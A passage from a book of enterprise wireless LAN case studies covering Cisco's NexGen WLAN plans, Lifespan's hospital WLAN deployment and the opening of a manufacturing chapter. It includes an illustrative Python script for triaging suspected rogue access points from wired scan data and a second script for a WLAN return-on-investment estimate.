uneconomical. This flexibility allows Cisco to tailor its internal global solution to every kind of site.
Figure 9-6 provides a snapshot of the NexGen WLAN architecture. Large campus buildings are fitted with
LWAPP access points. Buildings are logically grouped into clusters, and dual redundant WLAN controllers
are used to manage the access points in each cluster. Wireless coverage is provided outside using Cisco
outdoor mesh access points. The outdoor mesh network is provided between buildings on large campus
sites to allow seamless roaming from building to building and to support enhanced wireless voice
services. Medium to large remote offices are also fitted with LWAPP access points, and dual redundant
WLAN controller appliances are installed locally. For small offices, IOS access points are used. Finally,
WLAN management is provided by both the WCS and the Wireless LAN Solution Engine (WLSE), which are
centrally located at regional data centers.

Figure 9-6. High-Level Overview of the Cisco Internal NexGen WLAN Project

Enhanced Security
The security framework for the Cisco internal NexGen WLAN will be based on the recently ratified IEEE
802.11i standard. Authentication will continue to be provided by EAP-FAST, a tunneled EAP method that
carries the credential exchange inside a TLS-protected tunnel. Data confidentiality and integrity will be
provided by WPA (TKIP) and WiFi Protected Access 2 (WPA2, which uses AES-CCMP), with the incremental
introduction of Advanced Encryption Standard (AES) capable devices.
The integrated Wireless Intrusion Detection System will be used to proactively monitor, detect, and
isolate wireless security threats, including rogue access points and well-known wireless hacking attacks.
The latter is a fundamental feature of the Cisco centralized WLAN solution, itself part of the Cisco Unified
Wireless Network solutions family. To learn more, visit
http://www.cisco.com/en/US/products/ps6306/prod_brochure09186a0080184925.html or go to
Cisco.com and search for the keyphrase Cisco Unified Wireless Network.
Finally, third-party scanning utilities will be used for wired network scanning; this is especially important
as a tool to reduce false positives and to assist with rogue AP detection in smaller sites and "air gapped"
locations, where there are fewer access points to undertake active over-the-air scanning.
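The wired scanning just described, and the internally developed wired rogue AP scanner covered in the Security section earlier in this case study (the tool that port-fingerprints every host on each Class C subnet, compares it with the inventory of Cisco IT-installed access points, and opens a Tier 2 case for anything "interesting"), as an added Python example. This is illustrative code written for this edition; it is not Cisco IT's tool, WLSE code, or any Cisco product. The port heuristics, the OUI list, the addresses, the inventory and the set of MACs "seen on the air" are all assumptions constructed here. The block also shows the false-positive reduction mentioned above: a host that fingerprints as an AP and was also reported by the over-the-air scanner is escalated, while one with wire-only evidence is merely queued for investigation.

```python
"""Wired-side rogue AP triage. Added illustration, not Cisco IT's internal tool.

Assumptions (none of these come from the case study):
- scan results arrive as (ip, mac, open_tcp_ports) tuples, constructed below;
- the authorized-AP inventory is a dict keyed by lower-case MAC address;
- rf_seen holds MACs the over-the-air scanner (WLSE/WIDS) has already reported.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Dict, Iterable, List, Set, Tuple

ScanHit = Tuple[str, str, Set[int]]  # (ip, mac, open TCP ports)

# Assumed heuristics: an AP's management plane tends to expose these TCP ports...
AP_MGMT_PORTS = {22, 23, 80, 443}
# ...while ordinary workstations/servers expose these, which argue against an AP.
HOST_PORTS = {25, 135, 139, 445, 1433, 3306, 3389}
# Assumed AP-vendor OUI prefixes (illustrative; check against the IEEE OUI list).
AP_OUIS = {"00:40:96", "00:0b:85"}


@dataclass(frozen=True)
class Finding:
    ip: str
    mac: str
    verdict: str  # "known" | "rogue_on_wire" | "interesting" | "ignore"
    score: int
    reasons: Tuple[str, ...]


def fingerprint_score(mac: str, ports: Set[int]) -> Tuple[int, Tuple[str, ...]]:
    """Crude 'TCP port fingerprint': +1 per management port, -2 per host-style
    port, +2 for an AP-vendor OUI. Returns (score, human-readable reasons)."""
    score, reasons = 0, []
    mgmt = ports & AP_MGMT_PORTS
    if mgmt:
        score += len(mgmt)
        reasons.append(f"mgmt ports {sorted(mgmt)}")
    hosty = ports & HOST_PORTS
    if hosty:
        score -= 2 * len(hosty)
        reasons.append(f"host ports {sorted(hosty)}")
    if mac.lower()[:8] in AP_OUIS:
        score += 2
        reasons.append("AP vendor OUI")
    return score, tuple(reasons)


def triage(scan: Iterable[ScanHit], subnets: Iterable[str], inventory: Dict[str, str],
           rf_seen: Set[str], threshold: int = 2) -> List[Finding]:
    """Classify every host found inside the scanned /24 ranges."""
    nets = [ip_network(s) for s in subnets]
    findings: List[Finding] = []
    for ip, mac, ports in scan:
        if not any(ip_address(ip) in net for net in nets):
            continue  # outside the Class C ranges this run is responsible for
        mac = mac.lower()
        if mac in inventory:
            findings.append(Finding(ip, mac, "known", 0, (f"inventory: {inventory[mac]}",)))
            continue
        score, reasons = fingerprint_score(mac, ports)
        if score < threshold:
            verdict = "ignore"
        elif mac in rf_seen:
            verdict = "rogue_on_wire"  # on the air *and* on our wire: not a neighbour's AP
        else:
            verdict = "interesting"    # wire-only evidence: Tier 2 should take a look
        findings.append(Finding(ip, mac, verdict, score, reasons))
    return findings


def open_cases(findings: Iterable[Finding]) -> List[dict]:
    """Turn actionable findings into help-desk cases (plain dicts here), highest priority first."""
    priority = {"rogue_on_wire": "P1", "interesting": "P3"}
    cases = [{"priority": priority[f.verdict], "queue": "Tier2-Wireless", "ip": f.ip,
              "mac": f.mac, "summary": f"{f.verdict}: {'; '.join(f.reasons)}"}
             for f in findings if f.verdict in priority]
    return sorted(cases, key=lambda c: c["priority"])


# Constructed sample data (not real Cisco IT addresses, MACs or inventory).
SAMPLE_SUBNETS = ["10.10.1.0/24", "10.10.2.0/24"]
SAMPLE_SCAN: List[ScanHit] = [
    ("10.10.1.5",   "00:40:96:aa:bb:01", {23, 80}),             # IT-installed AP, in inventory
    ("10.10.1.77",  "00:40:96:aa:bb:99", {80, 443}),            # AP-vendor OUI, web management, unknown
    ("10.10.1.80",  "00:1e:c2:11:22:33", {23, 80}),             # AP-like ports, also seen on the air
    ("10.10.1.20",  "00:50:56:ab:cd:ef", {80, 135, 139, 445}),  # Windows host running a web server
    ("10.10.2.9",   "00:13:10:de:ad:01", {80}),                 # a single web port: weak evidence
    ("192.168.5.5", "00:40:96:00:00:01", {80, 443}),            # outside the scanned ranges
]
SAMPLE_INVENTORY = {"00:40:96:aa:bb:01": "AP-SJC-B12-3F-07"}
SAMPLE_RF_SEEN = {"00:1e:c2:11:22:33"}


def run_sample() -> Tuple[List[Finding], List[dict]]:
    findings = triage(SAMPLE_SCAN, SAMPLE_SUBNETS, SAMPLE_INVENTORY, SAMPLE_RF_SEEN)
    return findings, open_cases(findings)


if __name__ == "__main__":
    sample_findings, sample_cases = run_sample()
    for f in sample_findings:
        print(f"{f.ip:<12} {f.mac} {f.verdict:<14} score={f.score:>3}  {'; '.join(f.reasons)}")
    for c in sample_cases:
        print(f"CASE {c['priority']} -> {c['queue']}: {c['ip']} {c['summary']}")
```

Run as a script, it prints one line per host on the scanned subnets and then the two cases (the wire-plus-air host as P1, the wire-only AP-vendor device as P3); the Windows host and the single-port device score below the threshold and generate nothing. In a real deployment the scan tuples would come from an actual port scanner, the inventory from the AP management database, and `open_cases` would call the help-desk system's API; the threshold and port sets are the knobs to tune against false positives at small sites.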

Location-Based Services
The Cisco WLAN Location Appliance will provide robust location-based services (LBS) such as asset
tracking to assist in E911 applications. Combined with the use of 802.11-based wireless asset tags, this
will allow Cisco IT to identify, locate, and track high-value assets in real time, down to a particular room
and usually within five meters of accuracy.

Outdoor Wireless
Cisco plans to extend the enterprise WLAN such that it will provide coverage outdoor between buildings
in its large campus sites. This coverage will be achieved with the use of the new Cisco Aironet 1510
outdoor mesh access point. The use of mesh technology will avoid the necessity of cabling each outdoor
access point and will ensure seamless self-configuration and optimization.
The outdoor coverage will be a logical extension of the indoor WLAN and will be protected with the same
level of robust security features.
Outdoor coverage will extend the capabilities of the enterprise WLAN and also ensure seamless, building-to-building roaming, which is especially important for wireless voice features.

Summary
Cisco Systems, Inc. deployed a global WLAN in 2000, and within 18 months, 27 percent of their staff
were using it as their primary access medium. Ubiquitous coverage and comprehensive entitlement
dramatically increased the uptake of the solution. Careful project and program management were
adopted during the deployment, and the global network was deployed in 400 sites in four months.
Security has continued to evolve in line with industry trends. Cisco believes the global WLAN has
resulted in real productivity benefits in the tens of millions of dollars. Enhanced services such as wireless
voice and guest WLAN networking have added to the success of the solution.
Cisco IT is undertaking a major global redesign of its solution in late 2005, and the NexGen WLAN will be
based on the Cisco integrated wireless network family, including the Cisco centralized WLAN solution for
large and medium sites and the Cisco distributed WLAN solution for small sites. Significant additional
enhanced services are being planned, including outdoor mesh wireless coverage, location-based services
for asset tracking, and significantly improved security with integrated wireless intrusion detection
services.
The Cisco solution continues to evolve and provide real-world, tangible, everyday benefits to every Cisco
employee in every office around the globe.

Endnotes
1. Cisco Systems, Inc. New Study Points to Substantial Financial Returns from Broad-Based Wireless
LAN Deployments. 2003. http://newsroom.cisco.com/dlls/hd_111203b.html.

Chapter 10. Healthcare Case Study

Lifespan was formed in 1994 through the merger of Rhode Island Hospital and Miriam Hospital, the two
largest acute care facilities in Rhode Island and Southern New England.
The reach of Lifespan's healthcare practice extends to Hasbro Children's Hospital, Emma Pendleton
Bradley Hospital, Newport Hospital, and hundreds of foundations and clinics. Lifespan is a not-for-profit
healthcare institution supporting more than 2,400 physicians. Lifespan's Rhode Island Hospital, Miriam
Hospital, and Emma Pendleton Bradley Hospital form the Academic Medical Center and serve as the
teaching arm of Brown Medical School for medical education and research.
This case study is the result of an interview with David Hemendinger, chief technology officer. Mr.
Hemendinger holds responsibility for enterprise-wide systems infrastructure and new technology
integration. This includes ownership of Lifespan's vast wide-area networks, local-area networks, wireless
networks, data centers, helpdesk, telecommunications, system security, and all new technology
deployment for the healthcare corporation.

Business Model
As part of a strategic plan developed within Lifespan in 1996, wireless technology was designated a
strategic and tactical element in the delivery of high-quality healthcare. This goal is achieved by enabling
mobile access to clinical systems and providing point-of-care functions to physicians and other clinicians
anytime, anywhere.

Defining the Business Case


Hemendinger explained that to realize these goals, Lifespan directed its attention to giving healthcare
providers the ability to perform their duties by leveraging WLANs to make mobility a mainstay.
According to Hemendinger, "When you understand how physicians and clinicians work, you can then
provide a service which makes a difference at the point of care with the patient."
Hemendinger relates that over time, enhanced patient care through the use of mobility improved
efficiencies within the clinical process, which resulted in an "it's the right thing to do" model. In essence,
they reduced the traditional return on investment (ROI) and total cost of ownership (TCO) requirements
to something less significant in the decision-making process. "On paper this technology and its
deployment is expensive, but when you go onto the floors and watch the clinical staff utilizing these
capabilities to provide complete diagnosis and patient treatment, its cost is easily justified," says
Hemendinger.
Using this argument, Lifespan's Information Services executive management was able to sit with senior
leadership and affiliate boards of directors to explain a comprehensive, clinical system strategy and the
valuable role infrastructure would play. Wireless was a tactical element of the plan and would contribute
to the high adoption rate and use by the physician and clinician. Although it was costly, the benefits that
Lifespan gained revolved around a cultural change that positively affected the care of the patient.
The efficiencies centered on how the wireless network provides the foundation for immediate access to
clinical systems, speeding the delivery of care, standardizing care practices, reducing interface errors at
all points where they might otherwise be made, and saving on now-unnecessary transcription costs.

The Strategic Value


In healthcare, time is the difference between life and death. Keeping this in mind, Lifespan's strategic
plan is to take the critical healthcare information to the patient rather than requiring the physician or
clinician to seek out the information. Hemendinger further explains the change in philosophy that
provided the catalyst to deploy a pervasive computing environment within the continuum of care.
According to Hemendinger, "We made a cultural shift. We deployed wireless not to reduce wire but to
give function; the wireless network has changed processes and spawned a revolution in attitudes and
culture within Lifespan hospitals. Originally conceived to support availability of data for physician order
entry [POM system] and clinical work, the wireless network has accomplished that and much more."

This principle has proven to be highly effective, supporting the cost justification based on a strategic
model (higher quality and more accurate treatment). Adopting this technology into the physicians' and
clinicians' workday was the foundation for acceptance and adoption within the clinical space. Information
is provided at the place and time it is needed. Healthcare professionals rely on the application resources
and pertinent data to make the best decisions possible.
Lifespan realized measurable and tangible benefits. The key benefit is through system use and adoption.
At Lifespan, the high adoption rate of its Computer Physician Order Management (CPOM) application
demonstrates this point. Launched across the WLAN two years ago, the compliance rate for Lifespan's
CPOM tool is greater than 90 percent. Conversely, the national healthcare average for adoption of similar
healthcare applications is only 8 percent.
For Lifespan to achieve these numbers, it had to develop their technology and application for mobile use
across all its enterprise WLANs.
Although harder to measure, two other benefits surfaced and improved at Lifespan: customer satisfaction
and risk mitigation. These byproducts came to fruition because of Lifespan's adoption of WLANs to
enable a mobile workforce. Customer satisfaction and risk mitigation cannot be overlooked in today's
healthcare environment.

Technology Considerations
Although the overall strategic technology plan was developed in 1997 with wireless in mind, the actual
wireless selection began mid-year 2000. The process included an extensive review of all WLAN providers
that existed at the time. Subsequently, the enterprise-wide deployment began in August 2001 and took
about six months.

Architectural Principles
One of the guiding principles to making the WLAN successful was the understanding that people in
healthcare cannot be tethered, lest they lose efficiency and time. The idea is to bring the computing
environment to the end user. If physicians and clinicians must search out systems, they will be less
inclined to use the applications as part of their daily work. This fact led to the other principles that would
challenge Lifespan. It had to change the culture.
The advancement of technology meant that devices, applications, and attitudes were changing. For a
physician to adopt the use of a laptop or tablet PC at the point of care, the design had to be friendly.
According to Hemendinger, "We had to have the technology and the application as comfortable to use as
a telephone."
The value was that as physicians used the technology, it reduced clinical errors and provided enhanced
decision support functions, immediate identification, and course of care.
The WLAN was built in phases with the intention of ubiquitous deployment; the initial phase was delivered
to maximize coverage, and follow-on phases amended the original architecture to allow for higher
throughput and higher densities and to support evolving technologies such as voice and video. The initial
two phases were designed for patient data only and were scoped as follows:
Phase 1 All clinical spaces (Intensive Care Units, medical space floors, emergency department,
etc.)
Phase 2 Operating rooms and administrative spaces
Now that the WLAN has been deployed, it covers over one million square feet of clinical space. This
coverage enables physicians to access patient information during rounds anywhere in the clinical space
on or across the campus. WLAN coverage extends to physicians' lounges, cafeterias, libraries, and
parking lots. This coverage allows physicians to access the network and the applications they need to
perform their job: Provide the best healthcare possible.
Over time, the need for additional bandwidth became evident to accommodate the addition of high-consumption applications. Although the original use for the WLAN focused on providing low-end data
access, diagnostic imaging and other advanced medical uses drove the bandwidth and density
(coverage) needs up. Moving forward, Lifespan will look to provide pervasive patient monitoring, patient
tracking, and VoIP capabilities. Figure 10-1 illustrates how support for additional locations and services

increased bandwidth and density needs. Each grouping represents the location, data type, and time
frame.

Figure 10-1. Locations and Services Directly Impact Bandwidth and Density

WLAN Design
Since the initial deployment, the WLAN design has gone through some major changes to adapt to the
needs outlined in the architecture. The first products deployed were the Cisco AP340 and AP350 series
access points. As expected, newer Cisco products emerged over time, keeping pace with the maturing WLAN
and WiFi standards. Lifespan has undergone numerous WLAN upgrades and now employs the Cisco
AP1200 series access points running 802.11a/b/g across the enterprise.
The WLAN grew over time from 350 to 500 APs and continues to grow as higher WLAN densities are
required. The WLAN now stretches from the clinical areas to operating rooms and administration spaces.
The density has also increased the access point count to accommodate the additional services provided
over the WLAN, such as location-based services and VoIP.
Lifespan also uses Cisco 1400 series bridges to give it flexibility and cost control in the campus metro.
These bridges act as both the primary and secondary building interconnections at many Lifespan
locations. The use of the bridge for MAN connectivity was a more economical solution than running
copper and fiber throughout the campus. Hemendinger said, "When you need to dig up roads to route
fiber and copper or manage long-term agreements with vendors for fiber connectivity, it becomes very
expensive to provide high-bandwidth connectivity; the wireless bridges have allowed us to provide better
service at lower cost."

Guest Networking
Lifespan is one of the most progressive and true early adopters of WLANs. One area of note is that they
provide full wireless guest access for patients in their rooms at Hasbro Children's Hospital. More
important, at the time of this writing, they do not charge for this service.
Imagine being able to send pictures of your new baby to relatives, updating people on your family's
condition, or passing the idle time you have in the hospital room by surfing the Internet.
Hemendinger recalled a quote recorded from a patient's family member that demonstrates the value of
this service:
"During the course of our son's multiyear treatments, we had numerous overnights and several
lengthy stays. Having direct high-speed wireless access to the Internet from my son's room was
critical in supporting many aspects of his treatment program. In addition to my son's usage, I was
able to spend quality time with him and, at the same time, keep up with my ongoing work and email. This enabled me to limit the number of vacation days needed, given that I was still able to be
productive. Without the wireless access, I would have been using extensive vacation time and/or
had to leave my son alone at the hospital during working hours. Simply stated, it made the whole
experience much easier for all of us. A must for all hospital stays."
Technically, the setup is simple. Guests are provisioned onto a separate part of the network with open
security. Lifespan provides this as a best-effort service, and as long as your wireless device software
supports profiles or autoconfiguration, patients can discover the Service Set Identifier (SSID) and off
they go. Additionally, some level of proxy and firewalling is provided.

RF and Interference
Interference is a true nuisance in the wireless world. In the medical arena, the U.S. Federal
Communications Commission (FCC) and U.S. Food and Drug Administration (FDA) have produced
frequency standards to which all medical devices must adhere. Medical frequency bands are confined to 900
MHz and 1.4 GHz. Lifespan has performed frequency analysis and frequency interference mapping in
many locations throughout the enterprise. This data gives network engineers the optimal antenna
placement to minimize interference.

Disaster Recovery
The WLAN is designed to be highly available and is correspondingly treated as a primary method of
access at Lifespan. However, individual APs within the enterprise WLAN might go down sometimes.
During a simple outage where only a single AP is down, the WLAN is designed to allow users to
seamlessly access the network at another AP.
"We also designed the WLAN in such a way that if you lose one or two APs on a floor, most users would
never even know it. There might be slight performance degradation, but for [the] most part, users would
not notice it," says Hemendinger.
In the case of a catastrophic event resulting in complete failure of the WLAN, patient care is not
compromised and neither is the access to critical clinical data. To support this principle, Lifespan did not
remove the wired infrastructure that allows some clinical systems to be used over the wired network. As
a tertiary precaution, the PDAs that physicians and clinicians carry also act as a backup during a
complete network failure because some critical data is stored locally on the devices.

Note
According to law in Rhode Island, physicians or clinicians must record all patient information or
care results destined for the medical record on a paper chart.

Network Management
Management of the access point infrastructure has been satisfactory. On the other hand, software for
client cards and adapters via automatic push remains problematic to Lifespan's IT department. In
practice, the department uses an 80/20 rule, where the aim is to manage 80 percent of the clients using
an automated method for software management. Hemendinger explains that if need be, it can settle for
a manual intervention for up to 20 percent of the clients: "If I can centrally push and capture 80 percent,
then I can handle hitting the streets for the remaining 20 percent."
The mix of hardware (11,000 client devices) in the Lifespan network puts client software management on
the forefront of issues that concern the company today. For Hemendinger and his IT teams, pushing
software to the client is significantly complex. "Push and end up with half the environment down or not. I
must mitigate risk to the best of our ability; we thoroughly test all updates. I must have staff that is
dedicated to crossing Ts and dotting Is prior to push; we are talking critical life-saving clinical systems,"
said Hemendinger.
The crux of Lifespan's client management problems lies in the fact that it supports a variety of WLAN
clients. Even knowing that it would be better to support only a limited number of devices and clients,
Hemendinger must put his customer first. The device must fit into the physician's daily work style as
opposed to having the physician learn to work with the device. This point reemphasizes that ease of use
drives high adoption. Today you will find several devices used in the enterprise:
Vocera for VoIP
Carts on wheels (700+)
Tablet PCs
WLAN-enabled laptops
Thousands of PDAs

To alleviate many possible problems, there is a current standard. All clients currently use Cisco PCMCIA
or PCI bus adaptors. Going forward, Lifespan's standard includes using Cisco Compatible Extension
(CCX) products in the WLAN enterprise.

Note
The Cisco Compatible Extension (CCX) program is an initiative to help ensure that client device and
silicon manufacturers' products are interoperable with a Cisco WLAN infrastructure and can take
advantage of Cisco innovations for enhanced security, mobility, quality of service (QoS), and
network management. To learn more, visit
http://www.cisco.com/en/US/partners/pr46/pr147/partners_pgm_concept_home.html.

Lifespan employs several automated products to provide robust client software push. Some tools include
off-the-shelf products like ePolicy Orchestrator (ePO) from Network Associates. However, like many early adopters, Lifespan has
developed many tools (scripts) in-house.

Security
Lifespan is a Cisco SAFE Blueprint adopter. Its security solution uses Cisco LEAP (Lightweight Extensible
Authentication Protocol) and the Cisco Access Control Server (ACS), which are standard recommendations for a
robust and secure WLAN infrastructure. One caveat applies to any LEAP deployment: its password-based
challenge/response exchange is exposed to offline dictionary attacks against weak user passwords, so a strong
password policy is essential, and Cisco's later guidance is to migrate to EAP-FAST, the method adopted in the
preceding Cisco case study. More information about the Cisco SAFE Blueprint can be found at
http://www.cisco.com/go/safe.
Looking beyond the authentication and encryption of APs and clients, as part of the security
architecture Lifespan must contend with device-level security for the variety of devices it supports.
Device-level security is a great concern because most are small handheld devices (PDAs), many of which
can have more than one user.
Physical security of the device, although a concern, is not as important as maintaining the integrity and
confidentiality of the data on the device. Device-level security stemmed from the need to protect
sensitive data, as required by the Health Insurance Portability and Accountability Act (HIPAA) and
Sarbanes-Oxley Act (SOX), from access by unauthorized personnel. To address this, third-party software
was installed on the PDAs that wipes the device's data after three failed login attempts.

Note
The Health Insurance Portability and Accountability Act of 1996 (HIPAA) amended the Internal
Revenue Code of 1986 to improve portability and continuity of health insurance coverage in the
group and individual markets; to combat waste, fraud, and abuse in health insurance and
healthcare delivery; to promote the use of medical savings accounts; to improve access to
long-term care services and coverage; to simplify the administration of health insurance; and
for other purposes. To learn more, visit http://www.cms.hhs.gov/hipaa/.

The Sarbanes-Oxley Act of 2002 (SOX) mandated several reforms to enhance corporate
responsibility, enhance financial disclosures, and combat corporate and accounting fraud. It
created the "Public Company Accounting Oversight Board," also known as the PCAOB, to
oversee the activities of the auditing profession. A PDF download of SOX can be found at
http://www.sec.gov/about/laws/soa2002.pdf.

Project Management and Process


Lifespan chose to handle all project management and implementation in-house. The deployment
included all facilities managed through a central office. The technical portion of the deployment was also
centrally managed through its NOC for provisioning. All needs for information such as floor plans and
labor, AP placement, and Power over Ethernet were handled separately through the facilities
organization.

Deployment and Implementation


At Lifespan, the enterprise WLAN deployment involved everyone. A comprehensive team included
individuals from networking, applications, helpdesk, and the physicians and clinicians who use it.
Adoption was driven by getting buy-in from everyone at Lifespan.
Training on applications and devices used on the WLAN was relatively easy. Access to all clinical data
was provided through a web portal called Lifelinks. This application (portal) is the same on all systems,
wired or wireless. The WLAN-enabled device took little time to learn because it was familiar to the users.
In the end, the one aspect of training that requires ongoing education is ensuring that people keep
point-of-care devices charged.

Site Survey
The site surveys were handled through a combination of internal staff supplemented by third-party
contractors for frequency analysis.
Having a complex family of devices that operate in multiple frequency bands is a constant concern
regarding interference. This concern mandates a complex and thorough site survey. In
operating rooms, a complete frequency analysis was done while they were in full operation to map
frequency interference under real-time conditions. This helped to create a complete picture of what
interference (RF patterns) existed. In the end, conducting a proper site survey is important to
avoid having to set up separate rules or "one-off" exemptions and to be able to function
efficiently.
Additional WLAN changes underway at Lifespan now revolve around the need for higher densities. These
changes when combined with the internal site survey and AP placement selection will enhance Lifespan's
WLAN to support higher-level applications. The idea is to continue with Lifespan's innovative approach.
Hemendinger's philosophy is "Just keep moving along and grow the WLAN as required to support the
advanced clinical systems required by our clinicians and expected by our patients."

What the Future Holds


Hemendinger reiterated that the reason Lifespan is so successful is that its approach has always been
pragmatic and futuristic: "Healthcare IT people typically aren't engineering solutions for the healthcare
environment; most are focused on specific projects and tasks. Lifespan looked at it from an enterprise,
re-engineering approach, and we were successful; we placed technology and systems holistically in
concert with each other, not one at a time."
In clinical units, mounds of paper order slips located on a secretary's desk are gone. In the halls,
clinicians wheel laptop carts and carry tablets, always in tune with up-to-the-minute patient data and
clinical decision support systems. In conference rooms, administrative personnel wirelessly connect to
network presentations, e-mail, and Internet access. On the nursing unit where the first personal VoIP
device implementation was recently completed, the silence is deafening, with overhead paging virtually
gone. This has a very positive effect on patients' ability to sleep, and it removes the constant reminder
to patients that they are in a hospital.

Tracking and Telemetry


Hemendinger sees Lifespan's next step for breakthrough technologies emerging in the tracking and
telemetry fields. He says that asset and resource tracking is a huge initiative in the healthcare arena; it's
the basic building block for process study and optimization. The idea is to have the WLAN infrastructure
provide a method for gathering and transporting positional telemetry within the enterprise, which could
include high-value assets, people, and processes.
In the healthcare environment, being able to track the location of a critical piece of equipment and direct
it to the necessary location can have life-saving consequences. Being able to track and find medical
devices for use and maintenance has financial benefits to all. Providers can quickly locate a piece of
equipment without spending critical time searching for where it is supposed to be. This also allows the
strategic placement of machines as opposed to having large numbers of them placed throughout the
hospital. Typically these machines are very expensive; reducing their numbers and optimizing their use
reduces cost.
Hospital telemetry devices (such as EKG and fetal heart monitors) are historically large machines that
impede the movement of patients. Improving the quality of care and enhancing the healing process
includes making the time spent in the hospital more comfortable. Allowing patients to move about and
be active is important to healthcare providers. Referring to how patients were traditionally confined to a
room or bed because of the medical monitoring device to which they were "tied," Hemendinger sees the
value in being able to provide the patient with the ability to move freely while receiving medical
treatment: "We want to untie the monitored patient from their room as they are today due to immobile
monitoring systems."
To fully utilize the enterprise WLAN to facilitate patient monitoring and telemetry, companies are shifting
from conventional wired bedside devices to more portable, wireless-enabled ones. Medical information
collection systems are becoming smaller, which helps to enable remote monitoring.
Hemendinger is also focused on the possibilities and future use of wireless, handheld point-of-care
devices. Because these devices are portable, nurses and physicians can carry them around as they
perform rounds to collect patient information. These wireless data collection and test devices will have
continuous online connectivity with the clinical system for data transfer and retrieval. "The very sick
patient who goes into Intensive Care requires lots of monitoring, and the physician or clinician will want
to be able to monitor independent of location while having information fed back into the clinical
systems," reports Hemendinger.

Radio Frequency Identification (RFID)


RFID technology is currently in pilot testing at Lifespan. Mostly for discovery purposes, the company is
looking into active and passive systems, both of which use the WLAN as a transport. Passive tags are
used as an upload point from patient wristbands; they provide higher levels of patient identification, act
as a backup to bar-coding, and carry information as a payload for use by the clinical
systems. Active systems are less mature and are constrained by computational power.

Summary
Lifespan's innovative approach in the deployment of an enterprise WLAN has allowed the company to
offer anytime, anywhere access to clinical systems for its physicians and clinicians. Lifespan's use of this
technology and the cultural change it has produced make the company a visionary in the realm of
wireless technology. The delivery of healthcare in Lifespan's hospitals has changed. Its enablement of
wireless devices for digital imagery, seamless connectivity for point-of-care systems, always-on network
access to LifeLinks, and complimentary WLAN access for patients make it truly superior in enterprise WLAN
deployment in healthcare.

Chapter 11. Manufacturing Case Study

The manufacturing industry has unique requirements. The network acts not only as a transport
that people use to send data but also as a business process enabler. Many functions of the WLAN are
independent of general network access; examples include factories, the machinery that builds
products, and the inventory or material goods that reside in warehouses. This case study outlines some of
these situations while still focusing on the typical office considerations. Key points discussed here fall
into three categories: technology, process, and policy. This chapter also outlines the business
considerations that help justify the use of WLAN and the future state as seen through the eyes of the
manufacturer.
The manufacturer interviewed for this case study chose to remain anonymous; however, a brief profile
will provide perspective for this chapter. The company is a member of the Fortune 500 and is the market
leader in its specific industry. The company employee base is more than 50,000 people with a global
presence in excess of 100 office locations in more than 20 different countries. Relative to other
companies of its size, this company is taking a new direction in the way it provides infrastructure
services and can be considered an early adopter of wireless networks. Other companies in this space and
of this size take a more cautious approach because the resulting cost to implement can sometimes
severely impact both operational expenditures (OPEX) and capital expenditures (CAPEX). The revenues
for this manufacturer exceed 20 billion U.S. dollars, which equates to more than 2 billion dollars in profit.

Business Model
The company's adoption of WLANs as a technology was based on the initiative to increase user
productivity, adopt Radio Frequency Identification (RFID), provide an alternative to physical cabling on
the factory floors, and provide an inventory control mechanism in the warehouse.
The company's use of WLANs had to fulfill two main goals:
First and foremost was the need to provide adequate documentation supporting the ability to
secure the transmission of data in the wireless medium.
Additionally, with the arrival of Sarbanes-Oxley, it had to be reviewed for compliance.
The compelling story that supported the business case for deploying WLANs was the result of a time
(use) study. The goal of the study was to prove a financial benefit to deploying WLANs. Those employees
who participated were asked to record their time daily.
This employee test bed consisted of three small groups composed of 15 to 20 individuals. They were
grouped into two user categories (mobile and nonmobile), which were then further classified into three
groups as follows:
No laptop
Laptop with no access to WLAN
Laptop with access to WLAN

Note
Mobile users were defined as individuals who work more than 15 hours a week away from their
desk while still in a company facility.

The results of the study from each user group were compared to each other to subjectively support the
need for WLANs in specific areas.

Note
Initially, the company did not encourage the use of the WLAN as a primary means of network
access because of cultural issues, specifically work patterns and concerns about security.

The time study focused on people productivity; however, the company had an additional hurdle to cross.
It was time for them to migrate their manufacturing and factory facilities from the older 900-MHz
systems to a more current 2.4-GHz (802.11) infrastructure. This would allow them to take advantage of
the emerging technologies and products coming into the market. Especially important were the ability to
take full advantage of RFID, cost avoidance, and flexibility. This is covered later in this
chapter.
The company is conducting a post-WLAN implementation follow-up study using the same individuals to
validate the assumptions and provide the needed data that would show a positive ROI.
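The study described above compared recorded time across the three user groups and is being followed up to show a positive ROI. The following added example (not the manufacturer's study or the book's own material) shows how such a comparison feeds a payback and NPV estimate; the group labels and the 15-hour "mobile" threshold come from the case study, but every figure (daily hours, headcount, loaded hourly rate, CAPEX, OPEX, discount rate) is constructed for illustration.

```python
"""Time-study comparison and payback estimate for a WLAN business case.

Added example; not the manufacturer's study or the book's own material.
Group labels follow the case study; all numbers are constructed.
"""
import math
from statistics import mean

# Constructed daily "productive hours" recorded by the three test groups.
# The manufacturer's study asked participants to record their time daily;
# these values stand in for that log.
TIME_LOG = {
    "no_laptop": [6.0, 6.2, 5.9, 6.1, 6.0],
    "laptop_no_wlan": [6.3, 6.4, 6.2, 6.5, 6.3],
    "laptop_with_wlan": [7.0, 7.2, 6.9, 7.1, 7.3],
}

MOBILE_HOURS_PER_WEEK = 15  # the study's threshold for a "mobile" user


def user_category(hours_away_from_desk_per_week):
    """Mobile if more than 15 hours a week away from the desk while on site."""
    return "mobile" if hours_away_from_desk_per_week > MOBILE_HOURS_PER_WEEK else "nonmobile"


def group_means(log):
    """Mean daily productive hours per group, the comparison the study relied on."""
    return {group: mean(hours) for group, hours in log.items()}


def daily_gain_hours(log, baseline, treatment):
    """Hours per day gained by the treatment group over the baseline group."""
    return mean(log[treatment]) - mean(log[baseline])


def annual_benefit(gain_hours_per_day, headcount, loaded_hourly_rate, workdays=230):
    """Value of the daily gain across the population the WLAN would serve."""
    return gain_hours_per_day * headcount * loaded_hourly_rate * workdays


def payback_years(capex, annual_opex, benefit):
    """Years until cumulative net benefit repays the capital outlay (inf if never)."""
    net = benefit - annual_opex
    return math.inf if net <= 0 else capex / net


def npv(capex, annual_opex, benefit, years, discount_rate):
    """Net present value of the deployment over a fixed horizon."""
    net = benefit - annual_opex
    return -capex + sum(net / (1 + discount_rate) ** t for t in range(1, years + 1))


if __name__ == "__main__":
    gain = daily_gain_hours(TIME_LOG, "laptop_no_wlan", "laptop_with_wlan")
    benefit = annual_benefit(gain, headcount=50, loaded_hourly_rate=60)
    print(group_means(TIME_LOG))
    print(f"gain {gain:.2f} h/day, benefit ${benefit:,.0f}/yr")
    print(f"payback {payback_years(300_000, 60_000, benefit):.2f} yr, "
          f"NPV ${npv(300_000, 60_000, benefit, 3, 0.08):,.0f}")
```

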